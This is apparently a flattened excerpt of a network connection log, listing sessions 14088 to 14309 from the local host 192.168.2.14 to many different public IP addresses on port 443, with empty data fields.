                                      14088192.168.2.1442170120.53.84.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14089192.168.2.145554282.202.121.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14090192.168.2.1452912190.124.247.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14091192.168.2.1454088184.104.117.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14092192.168.2.14417489.116.29.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14093192.168.2.1457808187.253.218.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14094192.168.2.143877283.44.68.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14095192.168.2.1438870187.81.146.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14096192.168.2.1436286190.173.175.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14097192.168.2.1449350129.56.154.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14098192.168.2.1442068174.198.137.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14099192.168.2.1452082161.61.188.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14100192.168.2.1433556118.229.3.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14101192.168.2.1457620151.61.237.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14102192.168.2.1459824223.164.139.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14103192.168.2.143390638.48.37.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14104192.168.2.1434546208.168.129.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14105192.168.2.1444906149.149.201.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14106192.168.2.1439156122.28.45.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14107192.168.2.1437158169.59.191.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14108192.168.2.1437522125.226.44.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14109192.168.2.14447629.16.92.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14110192.168.2.1443412210.126.26.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14111192.168.2.1436572142.26.130.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14112192.168.2.1436720106.244.206.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14113192.168.2.1451482153.249.49.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14114192.168.2.1443552185.205.128.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14115192.168.2.1451676172.69.54.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14116192.168.2.144843227.50.132.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14117192.168.2.1452950218.115.14.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14118192.168.2.1454706148.109.79.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14119192.168.2.1455532109.159.8.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14120192.168.2.1451204194.215.148.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14121192.168.2.144336053.143.80.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14122192.168.2.146067442.100.100.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14123192.168.2.1442906211.163.134.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14124192.168.2.1442474170.255.180.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14125192.168.2.144978486.117.20.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14126192.168.2.1456886185.203.64.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14127192.168.2.1458292176.85.129.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14128192.168.2.1435970220.88.235.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14129192.168.2.143745269.163.18.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14130192.168.2.144126648.247.189.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14131192.168.2.1434144146.37.161.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14132192.168.2.144474891.127.69.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14133192.168.2.1459554151.173.99.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14134192.168.2.1445026144.55.103.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14135192.168.2.144155614.94.233.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14136192.168.2.14534609.131.172.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14137192.168.2.145816472.225.108.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14138192.168.2.1453162177.191.51.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14139192.168.2.1445550172.171.174.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14140192.168.2.143401064.84.97.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14141192.168.2.144384692.195.240.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14142192.168.2.1438732151.190.20.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14143192.168.2.1435080152.23.28.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14144192.168.2.1436626218.76.163.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14145192.168.2.1439112134.75.212.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14146192.168.2.143345699.126.109.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14147192.168.2.1442062201.32.140.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14148192.168.2.1438348223.251.215.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14149192.168.2.1449072128.151.102.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14150192.168.2.144918079.40.247.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14151192.168.2.143793683.106.141.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14152192.168.2.144113491.232.139.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14153192.168.2.144124254.236.124.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14154192.168.2.1457014210.228.155.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14155192.168.2.1442704211.26.16.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14156192.168.2.14468388.68.223.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14157192.168.2.145264835.197.156.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14158192.168.2.1438332165.3.224.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14159192.168.2.143642492.84.221.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14160192.168.2.144292459.18.255.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14161192.168.2.1446294192.243.218.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14162192.168.2.1444302188.213.233.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14163192.168.2.143836064.50.209.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14164192.168.2.1438650136.233.22.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14165192.168.2.1460508208.51.43.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14166192.168.2.1436360134.152.76.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14167192.168.2.1460480158.71.254.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14168192.168.2.144940260.54.197.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14169192.168.2.1454330162.180.137.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14170192.168.2.1434888187.150.212.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14171192.168.2.1447212158.176.157.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14172192.168.2.1439552204.76.149.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14173192.168.2.1443280193.1.102.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14174192.168.2.145793619.29.212.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14175192.168.2.144029052.204.227.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14176192.168.2.1442934153.130.136.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14177192.168.2.143697844.244.83.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14178192.168.2.1452534223.164.220.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14179192.168.2.1446734187.9.109.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14180192.168.2.1443690154.174.246.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14181192.168.2.14331021.84.187.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14182192.168.2.1442994110.214.212.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14183192.168.2.1439800114.13.128.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14184192.168.2.143432668.170.203.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14185192.168.2.1444144119.221.148.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14186192.168.2.145789432.152.169.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14187192.168.2.1452238222.70.130.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14188192.168.2.1446886151.249.76.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14189192.168.2.144275027.253.106.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14190192.168.2.145590232.9.60.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14191192.168.2.145348246.253.222.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192192.168.2.144995699.156.148.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14193192.168.2.1442372165.186.123.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14194192.168.2.1437688130.228.5.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14195192.168.2.1437470179.206.129.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14196192.168.2.145015482.109.102.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14197192.168.2.1449298120.65.59.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14198192.168.2.1441416180.219.227.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14199192.168.2.1453634140.58.80.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14200192.168.2.144296640.12.17.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14201192.168.2.145823838.76.134.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14202192.168.2.1460416200.52.175.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14203192.168.2.1441088119.149.81.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14204192.168.2.1439588194.189.109.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14205192.168.2.1446972163.173.91.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14206192.168.2.144083481.41.75.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14207192.168.2.1443030115.105.53.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14208192.168.2.1434170133.27.99.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14209192.168.2.1452276101.169.217.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14210192.168.2.145970243.96.30.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14211192.168.2.145270490.220.208.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14212192.168.2.145930048.124.153.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14213192.168.2.145301445.46.197.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14214192.168.2.1445348176.36.27.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14215192.168.2.1438090140.2.65.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14216192.168.2.1435810223.162.111.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14217192.168.2.1445902203.125.14.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14218192.168.2.1437514198.166.17.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14219192.168.2.143458665.205.74.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14220192.168.2.145436245.206.33.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14221192.168.2.1460126105.24.50.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14222192.168.2.144025897.3.209.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14223192.168.2.145537659.231.172.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14224192.168.2.143681254.247.124.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14225192.168.2.144117669.42.157.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14226192.168.2.1443160187.54.191.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14227192.168.2.14397625.94.150.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14228192.168.2.1432860196.171.251.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14229192.168.2.1436732148.169.200.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14230192.168.2.1460416175.71.102.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14231192.168.2.1435310159.97.92.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14232192.168.2.1453042211.42.14.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14233192.168.2.145360482.129.183.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14234192.168.2.145757857.159.170.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14235192.168.2.144298489.202.222.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14236192.168.2.143918279.174.57.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14237192.168.2.1449296150.138.131.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14238192.168.2.1453758175.62.229.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14239192.168.2.1450606133.163.143.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14240192.168.2.1460482101.129.130.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14241192.168.2.1460876115.184.204.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14242192.168.2.1441354216.190.30.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14243192.168.2.1434154192.40.5.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14244192.168.2.14589109.31.74.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14245192.168.2.1437434148.48.120.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14246192.168.2.1440460208.238.44.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14247192.168.2.1450226200.21.108.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14248192.168.2.1443448100.2.77.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14249192.168.2.1456620176.232.176.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14250192.168.2.1441062178.89.44.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14251192.168.2.1452544106.20.131.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14252192.168.2.1460020177.58.215.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14253192.168.2.1455686220.1.111.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14254192.168.2.1452816102.62.191.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14255192.168.2.1455980204.247.86.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14256192.168.2.1434102111.121.130.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14257192.168.2.145507453.219.163.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14258192.168.2.144910288.1.198.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14259192.168.2.1434478188.191.242.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14260192.168.2.1454928145.236.38.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14261192.168.2.1458746203.45.92.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14262192.168.2.145449827.190.150.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14263192.168.2.1442316150.63.167.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14264192.168.2.1443200105.0.228.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14265192.168.2.14582665.46.176.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14266192.168.2.145942853.194.240.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14267192.168.2.1452458147.112.203.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14268192.168.2.145340297.136.4.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14269192.168.2.144110054.214.85.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14270192.168.2.1449200189.49.190.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14271192.168.2.143802880.218.43.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14272192.168.2.1443730104.187.211.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14273192.168.2.1446132158.50.244.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14274192.168.2.1455156159.114.250.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14275192.168.2.1434512179.114.150.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14276192.168.2.144511864.179.239.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14277192.168.2.1446728198.209.187.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14278192.168.2.1460214109.187.114.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14279192.168.2.1439640184.76.98.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14280192.168.2.144126046.73.235.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14281192.168.2.1450582153.82.107.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14282192.168.2.144389620.104.183.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14283192.168.2.1442600112.45.244.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14284192.168.2.14525222.145.82.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14285192.168.2.1448340221.59.71.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14286192.168.2.1458936104.63.203.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14287192.168.2.1454566154.37.16.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14288192.168.2.1436774139.91.98.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14289192.168.2.1443688148.104.189.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14290192.168.2.1447448186.187.177.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14291192.168.2.144134897.236.233.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14292192.168.2.145886442.218.136.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14293192.168.2.1436488111.53.203.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14294192.168.2.145898699.33.0.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14295192.168.2.1458850156.102.200.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14296192.168.2.1456898203.217.160.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14297192.168.2.143425650.239.83.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14298192.168.2.143821225.107.203.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14299192.168.2.1448544207.134.244.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14300192.168.2.1457614161.225.182.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14301192.168.2.1452664150.210.181.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14302192.168.2.144673476.133.50.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14303192.168.2.145981895.96.121.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14304192.168.2.1447280117.138.214.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14305192.168.2.1439418108.190.225.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14306192.168.2.144918645.99.92.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14307192.168.2.146071069.117.243.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14308192.168.2.1438090210.251.78.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14309192.168.2.145458264.20.133.178443
                                      TimestampBytes transferredDirectionData


